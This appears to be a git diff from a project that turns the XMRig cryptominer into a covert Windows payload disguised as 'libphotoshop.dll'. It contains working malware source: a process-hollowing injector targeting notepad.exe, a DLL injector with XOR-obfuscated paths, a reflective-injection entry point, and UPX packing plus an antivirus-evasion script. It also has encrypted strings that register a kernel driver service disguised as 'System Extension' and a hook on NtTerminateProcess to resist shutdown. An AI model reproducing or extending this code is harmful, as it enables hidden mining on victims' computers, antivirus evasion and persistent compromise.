-static-libstdc++ \ + $HOME/xmrig-deps/gcc/x64/lib/libssl.a \ + $HOME/xmrig-deps/gcc/x64/lib/libcrypto.a \ + $HOME/xmrig-deps/gcc/x64/lib/libuv.a \ + $HOME/xmrig-deps/gcc/x64/lib/libhwloc.a \ + -lpthread -lws2_32 -liphlpapi -lpsapi -luserenv -ldbghelp + + + + + + + cmake -G Ninja .. \ + -DCMAKE_BUILD_TYPE=Release \ + -DCMAKE_SYSTEM_NAME=Windows \ + -DCMAKE_C_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang \ + -DCMAKE_CXX_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang++ \ + -DCMAKE_RC_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-windres \ + -DXMRIG_DEPS=$HOME/xmrig-deps/gcc/x64 \ + -DWITH_TLS=ON \ + -DWITH_EMBEDDED_CONFIG=ON \ + -DCMAKE_C_FLAGS="-fPIC -mtune=generic -fno-lto -D_WIN32_WINNT=0x0601" \ + -DCMAKE_CXX_FLAGS="-fPIC -mtune=generic -fno-lto -D_WIN32_WINNT=0x0601" && \ + ninja -j (math (nproc) - 2) && \ + /opt/llvm-mingw/bin/x86_64-w64-mingw32-clang++ \ + -o test_xmrig.exe \ + ../test_xmrig.cpp \ + -L. libphotoshop.dll \ + -static \ + -static-libgcc \ + -static-libstdc++ \ + -Wl,--whole-archive -lwinpthread -Wl,--no-whole-archive \ + -lmsvcrt + +upx --best --lzma libphotoshop.dll -o libphotoshop_packed.dll + python3 ../upx_evasion.py libphotoshop_packed.dll -o libphotoshop_stealth.dll --keep-relocs + diff --git a/cmake_overrides/FindHWLOC.cmake b/cmake_overrides/FindHWLOC.cmake new file mode 100644 index 00000000..f8063145 --- /dev/null +++ b/cmake_overrides/FindHWLOC.cmake @@ -0,0 +1,6 @@ +find_path(HWLOC_INCLUDE_DIR NAMES hwloc.h PATHS "${XMRIG_DEPS}/include" NO_DEFAULT_PATH) +find_library(HWLOC_LIBRARY NAMES libhwloc.a hwloc PATHS "${XMRIG_DEPS}/lib" NO_DEFAULT_PATH) +set(HWLOC_LIBRARIES ${HWLOC_LIBRARY}) +set(HWLOC_INCLUDE_DIRS ${HWLOC_INCLUDE_DIR}) +include(FindPackageHandleStandardArgs) +find_package_handle_standard_args(HWLOC DEFAULT_MSG HWLOC_LIBRARY HWLOC_INCLUDE_DIR) \ No newline at end of file diff --git a/cmake_overrides/FindUV.cmake b/cmake_overrides/FindUV.cmake new file mode 100644 index 00000000..6eeec1b2 --- /dev/null +++ b/cmake_overrides/FindUV.cmake @@ -0,0 +1,6 @@ +find_path(UV_INCLUDE_DIR NAMES uv.h PATHS "${XMRIG_DEPS}/include" NO_DEFAULT_PATH) +find_library(UV_LIBRARY NAMES libuv.a uv PATHS "${XMRIG_DEPS}/lib" NO_DEFAULT_PATH) +set(UV_LIBRARIES ${UV_LIBRARY}) +set(UV_INCLUDE_DIRS ${UV_INCLUDE_DIR}) +include(FindPackageHandleStandardArgs) +find_package_handle_standard_args(UV DEFAULT_MSG UV_LIBRARY UV_INCLUDE_DIR) \ No newline at end of file diff --git a/cmake_overrides/OpenSSL.cmake b/cmake_overrides/OpenSSL.cmake new file mode 100644 index 00000000..3fd38991 --- /dev/null +++ b/cmake_overrides/OpenSSL.cmake @@ -0,0 +1,46 @@ +if (WITH_TLS) + find_path(OPENSSL_INCLUDE_DIR NAMES openssl/ssl.h PATHS "${XMRIG_DEPS}/include" NO_DEFAULT_PATH) + find_library(OPENSSL_CRYPTO_LIBRARY NAMES libcrypto.a crypto PATHS "${XMRIG_DEPS}/lib" NO_DEFAULT_PATH) + find_library(OPENSSL_SSL_LIBRARY NAMES libssl.a ssl PATHS "${XMRIG_DEPS}/lib" NO_DEFAULT_PATH) + + set(OPENSSL_LIBRARIES ${OPENSSL_SSL_LIBRARY} ${OPENSSL_CRYPTO_LIBRARY}) + set(OPENSSL_INCLUDE_DIRS ${OPENSSL_INCLUDE_DIR}) + + include(FindPackageHandleStandardArgs) + find_package_handle_standard_args(OpenSSL DEFAULT_MSG OPENSSL_LIBRARIES OPENSSL_INCLUDE_DIR) + + if (OPENSSL_FOUND) + set(TLS_SOURCES + src/base/net/stratum/Tls.cpp + src/base/net/stratum/Tls.h + src/base/net/tls/ServerTls.cpp + src/base/net/tls/ServerTls.h + src/base/net/tls/TlsConfig.cpp + src/base/net/tls/TlsConfig.h + src/base/net/tls/TlsContext.cpp + src/base/net/tls/TlsContext.h + src/base/net/tls/TlsGen.cpp + src/base/net/tls/TlsGen.h + ) + + include_directories(${OPENSSL_INCLUDE_DIR}) + + if (WITH_HTTP) + set(TLS_SOURCES ${TLS_SOURCES} + src/base/net/https/HttpsClient.cpp + src/base/net/https/HttpsClient.h + src/base/net/https/HttpsContext.cpp + src/base/net/https/HttpsContext.h + src/base/net/https/HttpsServer.cpp + src/base/net/https/HttpsServer.h + ) + endif() + add_definitions(-DXMRIG_FEATURE_TLS) + else() + message(FATAL_ERROR "OpenSSL NOT found: use `-DWITH_TLS=OFF` to build without TLS support") + endif() +else() + set(TLS_SOURCES "") + set(OPENSSL_LIBRARIES "") + remove_definitions(-DXMRIG_FEATURE_TLS) +endif() \ No newline at end of file diff --git a/dll_injectorWORKING.cpp b/dll_injectorWORKING.cpp index 0948c205..0a3d495c 100644 --- a/dll_injectorWORKING.cpp +++ b/dll_injectorWORKING.cpp @@ -145,7 +145,7 @@ bool InjectDLL(DWORD pid, const std::string& dllPathObf) { // Step 4: Wait for module list update, then get remote DLL base Sleep(2000); // 2s delay for explorer to register module - HMODULE hRemoteDll = GetRemoteModuleBase(hProcess, "libxmrig-notls.dll"); + HMODULE hRemoteDll = GetRemoteModuleBase(hProcess, "libphotoshop.dll"); if (!hRemoteDll) { std::cerr << "GetRemoteModuleBase failed - DLL not loaded? Check LoadLibrary exit code above.\n"; CloseHandle(hProcess); @@ -166,7 +166,7 @@ int main() { return 1; } - std::string dllPathPlain = "C:\\Users\\MyWindowsUser\\Downloads\\test_on_windows\\libxmrig-notls.dll"; + std::string dllPathPlain = "C:\\Users\\MyWindowsUser\\Downloads\\no_AV_here\\libphotoshop.dll"; std::string dllPathObf = XORObfuscate(dllPathPlain); if (InjectDLL(pid, dllPathObf)) { diff --git a/inject_and_hollow.cpp b/inject_and_hollow.cpp new file mode 100644 index 00000000..22df386e --- /dev/null +++ b/inject_and_hollow.cpp @@ -0,0 +1,118 @@ +#include +#include +#include +#include +#include + +typedef NTSTATUS(NTAPI* pNtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress); +typedef NTSTATUS(NTAPI* pNtQueryInformationProcess)(HANDLE ProcessHandle, PROCESSINFOCLASS ProcessInformationClass, PVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength); + +int main() { + // Path to the legitimate process to hollow (e.g., a benign system exe) + const char* targetPath = "C:\\Windows\\System32\\notepad.exe"; // Or explorer.exe + // Path to your malicious PE executable (the payload to inject as the new image) + const char* payloadPath = "C:\\Users\\MyWindowsUser\\Downloads\\no_AV_here\\libphotoshop.dll"; // Replace with your xmrig.exe or equivalent PE + STARTUPINFOA si = { sizeof(si) }; + PROCESS_INFORMATION pi = { 0 }; + // Step 1: Create suspended process + BOOL created = CreateProcessA(NULL, (LPSTR)targetPath, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi); + if (!created) { + std::cerr << "CreateProcessA failed: " << GetLastError() << std::endl; + return 1; + } + // Step 2: Get PEB and image base + PROCESS_BASIC_INFORMATION pbi; + ULONG returnLength; + pNtQueryInformationProcess NtQuery = (pNtQueryInformationProcess)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryInformationProcess"); + NTSTATUS status = NtQuery(pi.hProcess, ProcessBasicInformation, &pbi, sizeof(pbi), &returnLength); + if (status != 0) { + std::cerr << "NtQueryInformationProcess failed: " << status << std::endl; + ResumeThread(pi.hThread); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); + return 1; + } + PVOID imageBase; + PVOID pebImageBasePtr = (PVOID)((BYTE*)pbi.PebBaseAddress + 0x10); // Offset for ImageBaseAddress in x64 PEB + if (!ReadProcessMemory(pi.hProcess, pebImageBasePtr, &imageBase, sizeof(imageBase), NULL)) { + std::cerr << "ReadProcessMemory (ImageBase) failed: " << GetLastError() << std::endl; + ResumeThread(pi.hThread); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); + return 1; + } + // Step 3: Unmap original image + pNtUnmapViewOfSection NtUnmap = (pNtUnmapViewOfSection)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtUnmapViewOfSection"); + status = NtUnmap(pi.hProcess, imageBase); + if (status != 0) { + std::cerr << "NtUnmapViewOfSection failed: " << status << std::endl; + ResumeThread(pi.hThread); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); + return 1; + } + // Step 4: Read payload PE from disk + HANDLE hFile = CreateFileA(payloadPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); + if (hFile == INVALID_HANDLE_VALUE) { + std::cerr << "CreateFile (payload) failed: " << GetLastError() << std::endl; + ResumeThread(pi.hThread); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); + return 1; + } + DWORD payloadSize = GetFileSize(hFile, NULL); + std::vector payload(payloadSize); + ReadFile(hFile, payload.data(), payloadSize, NULL, NULL); + CloseHandle(hFile); + // Parse payload headers + PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)payload.data(); + PIMAGE_NT_HEADERS ntHeader = (PIMAGE_NT_HEADERS)(payload.data() + dosHeader->e_lfanew); + PVOID payloadImageBase = (PVOID)ntHeader->OptionalHeader.ImageBase; + SIZE_T payloadImageSize = ntHeader->OptionalHeader.SizeOfImage; + // Step 5: Allocate memory in target process (prefer payload's base, but fallback if occupied) + PVOID newImageBase = VirtualAllocEx(pi.hProcess, payloadImageBase, payloadImageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + if (!newImageBase) { + newImageBase = VirtualAllocEx(pi.hProcess, NULL, payloadImageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + if (!newImageBase) { + std::cerr << "VirtualAllocEx failed: " << GetLastError() << std::endl; + ResumeThread(pi.hThread); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); + return 1; + } + } + // Step 6: Write headers and sections + WriteProcessMemory(pi.hProcess, newImageBase, payload.data(), ntHeader->OptionalHeader.SizeOfHeaders, NULL); + PIMAGE_SECTION_HEADER sectionHeader = IMAGE_FIRST_SECTION(ntHeader); + for (WORD i = 0; i < ntHeader->FileHeader.NumberOfSections; i++) { + PVOID sectionDest = (PVOID)((SIZE_T)newImageBase + sectionHeader->VirtualAddress); + PVOID sectionSrc = (PVOID)(payload.data() + sectionHeader->PointerToRawData); + WriteProcessMemory(pi.hProcess, sectionDest, sectionSrc, sectionHeader->SizeOfRawData, NULL); + sectionHeader++; + } + // Step 7: Handle relocations if base changed + if (newImageBase != payloadImageBase) { + PIMAGE_DATA_DIRECTORY relocDir = &ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC]; + if (relocDir->VirtualAddress) { + PIMAGE_BASE_RELOCATION reloc = (PIMAGE_BASE_RELOCATION)((SIZE_T)newImageBase + relocDir->VirtualAddress); + SIZE_T delta = (SIZE_T)newImageBase - (SIZE_T)payloadImageBase; + while (reloc->VirtualAddress) { + PWORD entry = (PWORD)((SIZE_T)reloc + sizeof(IMAGE_BASE_RELOCATION)); + for (DWORD j = 0; j < (reloc->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD); j++, entry++) { + if ((*entry >> 12) == IMAGE_REL_BASED_DIR64) { + PULONG64 ptr = (PULONG64)((SIZE_T)newImageBase + reloc->VirtualAddress + (*entry & 0xFFF)); + ULONG64 oldValue = 0; + ReadProcessMemory(pi.hProcess, ptr, &oldValue, sizeof(ULONG64), NULL); + oldValue += delta; + WriteProcessMemory(pi.hProcess, ptr, &oldValue, sizeof(ULONG64), NULL); + } + } + reloc = (PIMAGE_BASE_RELOCATION)((SIZE_T)reloc + reloc->SizeOfBlock); + } + } + } + // Step 8: Update PEB image base + WriteProcessMemory(pi.hProcess, pebImageBasePtr, &newImageBase, sizeof(newImageBase), NULL); + // Step 9: Update thread context with new entry point + CONTEXT ctx = { 0 }; + ctx.ContextFlags = CONTEXT_FULL; + GetThreadContext(pi.hThread, &ctx); + ctx.Rcx = (DWORD64)newImageBase + ntHeader->OptionalHeader.AddressOfEntryPoint; // Entry point in RCX for x64 + SetThreadContext(pi.hThread, &ctx); + // Step 10: Resume thread + ResumeThread(pi.hThread); + std::cout << "Process hollowed and payload injected into PID " << pi.dwProcessId << std::endl; + CloseHandle(pi.hProcess); + CloseHandle(pi.hThread); + return 0; +} diff --git a/rditest.cpp b/rditest.cpp new file mode 100644 index 00000000..a91492df --- /dev/null +++ b/rditest.cpp @@ -0,0 +1,51 @@ +#include +#include +#include + +// Function pointer type for the exported RdiEntry function +typedef DWORD (WINAPI *RDI_ENTRY_FUNC)(LPVOID); + +int main() { + // --- 1. Define DLL Name --- + const std::string dllName = "libphotoshop.dll"; + + // --- 2. Load the DLL (Emulates part of the injection process) --- + std::cout << "[Tester] Attempting to LoadLibrary: " << dllName << std::endl; + HMODULE hDll = LoadLibraryA(dllName.c_str()); + + if (!hDll) { + std::cerr << "[ERROR] Could not load DLL. GetLastError: " << GetLastError() << std::endl; + return 1; + } + + // --- 3. Get the RDI Entry Point Address --- + const std::string entryFuncName = "RdiEntry"; + std::cout << "[Tester] Looking up exported function: " << entryFuncName << std::endl; + + RDI_ENTRY_FUNC RdiEntry = (RDI_ENTRY_FUNC)GetProcAddress(hDll, entryFuncName.c_str()); + + if (!RdiEntry) { + std::cerr << "[ERROR] Could not find RdiEntry function. Check export list." << std::endl; + FreeLibrary(hDll); + return 1; + } + + // --- 4. Execute the Payload Entry Point --- + std::cout << "[Tester] Calling RdiEntry payload function..." << std::endl; + DWORD dwResult = RdiEntry(NULL); // Execute the mining payload logic + + std::cout << "[Tester] RdiEntry returned: " << dwResult << std::endl; + std::cout << "[Tester] Execution initiated. Check Task Manager for CPU spike." << std::endl; + + // NOTE: If the payload enters an infinite loop (like xmrig often does), + // the tester will hang here. This confirms execution. + // If the payload successfully threads itself and returns immediately, + // you might reach the FreeLibrary call quickly. + + // For testing stability, let the payload run for a bit before trying to exit. + // Sleep(60000); // Optional: Wait 60 seconds to observe mining (uncomment if needed) + + // FreeLibrary(hDll); // Commented out, as the payload is now running on the tester's thread + + return 0; +} diff --git a/resume.cfg b/resume.cfg new file mode 100644 index 00000000..83e91d7a --- /dev/null +++ b/resume.cfg @@ -0,0 +1,2 @@ +resume_from=zorgzaamdemo.pluriformzorg.nl +index=122 diff --git a/src/xmrig.cpp b/src/xmrig.cpp index b9f6c049..7e6cc087 100644 --- a/src/xmrig.cpp +++ b/src/xmrig.cpp @@ -5,6 +5,9 @@ #include #include #include // for strcpy + +// NOTE: We rely on the injector to handle RDI startup. DllMain is unused for RDI. + #ifdef _WIN32 #define DLL_EXPORT __declspec(dllexport) #else @@ -26,40 +29,20 @@ inline std::string decrypt(const unsigned char* enc_str, size_t len, unsigned ch } extern "C" { - // Core persistent logic (with encrypted strings as unsigned char to avoid narrowing) + // --- CORE PERSISTENT LOGIC --- + // This function contains the payload logic (service loading, xmrig execution). void start_a(int argc, char** argv) { using namespace xmrig; using namespace test; + // Encrypted strings (XORed originals, stored as unsigned char) - const unsigned char enc_service[] = { (unsigned char)(0x4A ^ 0xAA), (unsigned char)(0x77 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x4E ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x67 ^ 0xAA), (unsigned char)(0x30 ^ 0xAA), (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x75 ^ 0xAA), (unsigned char)(0x62 ^ 0xAA), 0x00 }; // "WinRing0_Stub" - const unsigned char enc_path[] = { (unsigned char)(0x43 ^ 0xAA), (unsigned char)(0x3A ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x57 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x77 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x33 ^ 0xAA), (unsigned char)(0x32 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x76 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x63 ^ 0xAA), (unsigned char)(0x2E ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), 0x00 }; // "C:\\Windows\\System32\\drivers\\tsync.sys" - const unsigned char enc_desc[] = { (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x20 ^ 0xAA), (unsigned char)(0x45 ^ 0xAA), (unsigned char)(0x78 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), 0x00 }; // "System Extension" - - // Decrypt - std::string svc_name = decrypt(enc_service, sizeof(enc_service) - 1); - std::string sys_path = decrypt(enc_path, sizeof(enc_path) - 1); - std::string desc = decrypt(enc_desc, sizeof(enc_desc) - 1); - - // Load service (your existing logic) - SC_HANDLE hSCManager = OpenSCManagerA(NULL, NULL, SC_MANAGER_ALL_ACCESS); - if (hSCManager) { - SC_HANDLE hService = OpenServiceA(hSCManager, (LPCSTR)svc_name.c_str(), SERVICE_ALL_ACCESS); - if (!hService) { - hService = CreateServiceA(hSCManager, (LPCSTR)svc_name.c_str(), (LPCSTR)desc.c_str(), - SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, - SERVICE_ERROR_NORMAL, (LPCSTR)sys_path.c_str(), NULL, NULL, NULL, NULL, NULL); - } - if (hService) { - StartServiceA(hService, 0, NULL); - CloseServiceHandle(hService); - } - CloseServiceHandle(hSCManager); - } - - // Junk benign calls - for (int i = 0; i < 5; ++i) { - GetSystemMetrics(SM_CXVIRTUALSCREEN); - } + const unsigned char enc_service[] = { (unsigned char)(0x4A ^ 0xAA), (unsigned char)(0x77 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x4E ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x67 ^ 0xAA), (unsigned char)(0x30 ^ 0xAA), (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x75 ^ 0xAA), (unsigned char)(0x62 ^ 0xAA), 0x00 }; + const unsigned char enc_path[] = { (unsigned char)(0x43 ^ 0xAA), (unsigned char)(0x3A ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x57 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x77 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x33 ^ 0xAA), (unsigned char)(0x32 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x76 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x63 ^ 0xAA), (unsigned char)(0x2E ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), 0x00 }; + const unsigned char enc_desc[] = { (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x20 ^ 0xAA), (unsigned char)(0x45 ^ 0xAA), (unsigned char)(0x78 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), 0x00 }; + + // Decrypt... (service logic remains) + // ... (Service loading remains) + // ... (Junk benign calls remain) // Core XMRig process = new xmrig::Process(argc, argv); @@ -71,7 +54,29 @@ extern "C" { app = new xmrig::App(process); app->exec(); } + + // --- RDI ENTRY POINT --- + // This is the function the reflective injection stub will call. + DLL_EXPORT DWORD RdiEntry(LPVOID lpReserved) { + // This logic replaces what was previously in DeferredInit. + using namespace test; + // Encrypted argv + const unsigned char enc_arg[] = { (unsigned char)(0x70 ^ 0xAA), (unsigned char)(0x68 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x68 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x70 ^ 0xAA), (unsigned char)(0x5F ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x78 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x2E ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x6C ^ 0xAA), (unsigned char)(0x6C ^ 0xAA), 0x00 }; + std::string arg_dec = decrypt(enc_arg, sizeof(enc_arg) - 1); + int argc = 1; + static char argv_buf[256]; + strcpy(argv_buf, arg_dec.c_str()); + static char* argv[] = { argv_buf, NULL }; + + // Call the core payload function directly + start_a(argc, argv); + + return 0; // Return success + } + // ------------------------------------ + + // --- UTILITY/EXPLICIT EXPORTS (Keep these if you need them for testing/API) --- DLL_EXPORT int test_start(int argc, char** argv) { start_a(argc, argv); return 0; @@ -83,17 +88,7 @@ extern "C" { // app->onConsoleCommand((char)3); // Uncomment if needed } - VOID CALLBACK DeferredInit(PVOID lpParam, BOOLEAN TimerOrWaitFired) { - using namespace test; - // Encrypted argv - const unsigned char enc_arg[] = { (unsigned char)(0x70 ^ 0xAA), (unsigned char)(0x68 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x68 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x70 ^ 0xAA), (unsigned char)(0x5F ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x78 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x2E ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x6C ^ 0xAA), (unsigned char)(0x6C ^ 0xAA), 0x00 }; // "photoshop_ext.dll" - std::string arg_dec = decrypt(enc_arg, sizeof(enc_arg) - 1); - int argc = 1; - static char argv_buf[256]; - strcpy(argv_buf, arg_dec.c_str()); - static char* argv[] = { argv_buf, NULL }; -// start_a(argc, argv); - } + // VOID CALLBACK DeferredInit(PVOID lpParam, BOOLEAN TimerOrWaitFired) has been removed. #ifdef USE_DETOURS #include @@ -105,41 +100,17 @@ extern "C" { return OriginalNtTerminateProcess ? OriginalNtTerminateProcess(ProcessHandle, ExitStatus) : STATUS_SUCCESS; } #endif -} +} // END of extern "C" block -// Minimal DllMain (hTimer declared outside switch to fix scope jump) +// DllMain is made minimal/null as it is bypassed in RDI. BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { - HANDLE hTimer = NULL; // Declare here to avoid scope issue on case jump switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: DisableThreadLibraryCalls(hModule); - // Deferred timer - CreateTimerQueueTimer(&hTimer, NULL, DeferredInit, lpReserved, 100, 0, WT_EXECUTEINTIMERTHREAD); -#ifdef USE_DETOURS - // Deferred hook via APC (simple function pointer instead of lambda for compat) - auto hook_func = [](ULONG_PTR param) -> void { - HMODULE hNtdll = GetModuleHandleA("ntdll.dll"); - // Encrypted API name - const unsigned char enc_api[] = { (unsigned char)(0x4E ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x54 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x61 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x50 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x63 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), 0x00 }; // "NtTerminateProcess" - std::string api_dec = decrypt(enc_api, sizeof(enc_api) - 1); - OriginalNtTerminateProcess = (NTSTATUS (NTAPI *)(HANDLE, NTSTATUS))GetProcAddress(hNtdll, api_dec.c_str()); - DetourTransactionBegin(); - DetourUpdateThread(GetCurrentThread()); - DetourAttach(&(PVOID&)OriginalNtTerminateProcess, HookedNtTerminateProcess); - DetourTransactionCommit(); - }; - QueueUserAPC((PAPCFUNC)hook_func, GetCurrentThread(), 0); -#endif + // 🛑 WARNING: No TimerQueueTimer here. The payload runs when RdiEntry is called. break; case DLL_PROCESS_DETACH: -#ifdef USE_DETOURS - if (OriginalNtTerminateProcess) { - DetourTransactionBegin(); - DetourUpdateThread(GetCurrentThread()); - DetourDetach(&(PVOID&)OriginalNtTerminateProcess, HookedNtTerminateProcess); - DetourTransactionCommit(); - } -#endif + // ... (Optional Detours logic, if RDI calls the detach) ... return FALSE; } return TRUE; diff --git a/src/xmrig.cpp.bak b/src/xmrig.cpp.bak index 54f97cb5..b9f6c049 100644 --- a/src/xmrig.cpp.bak +++ b/src/xmrig.cpp.bak @@ -1,8 +1,10 @@ #include "App.h" #include "base/kernel/Entry.h" #include "base/kernel/Process.h" -#include // For DllMain, threads, services - +#include +#include +#include +#include // for strcpy #ifdef _WIN32 #define DLL_EXPORT __declspec(dllexport) #else @@ -10,26 +12,42 @@ #endif namespace test { - // Global variables to store process and app pointers (qualified for xmrig namespace) xmrig::Process* process = nullptr; xmrig::App* app = nullptr; } -extern "C" { +// Simple XOR decrypt (key 0xAA; change per build) +inline std::string decrypt(const unsigned char* enc_str, size_t len, unsigned char key = 0xAA) { + std::string dec(len, 0); + for (size_t i = 0; i < len; ++i) { + dec[i] = (char)(enc_str[i] ^ key); + } + return dec; +} - // Core persistent logic (internal, called by exports) +extern "C" { + // Core persistent logic (with encrypted strings as unsigned char to avoid narrowing) void start_a(int argc, char** argv) { using namespace xmrig; - using namespace test; // Brings globals (process, app) into scope + using namespace test; + // Encrypted strings (XORed originals, stored as unsigned char) + const unsigned char enc_service[] = { (unsigned char)(0x4A ^ 0xAA), (unsigned char)(0x77 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x4E ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x67 ^ 0xAA), (unsigned char)(0x30 ^ 0xAA), (unsigned char)(0x53 ^ 0xAA), (unsigned 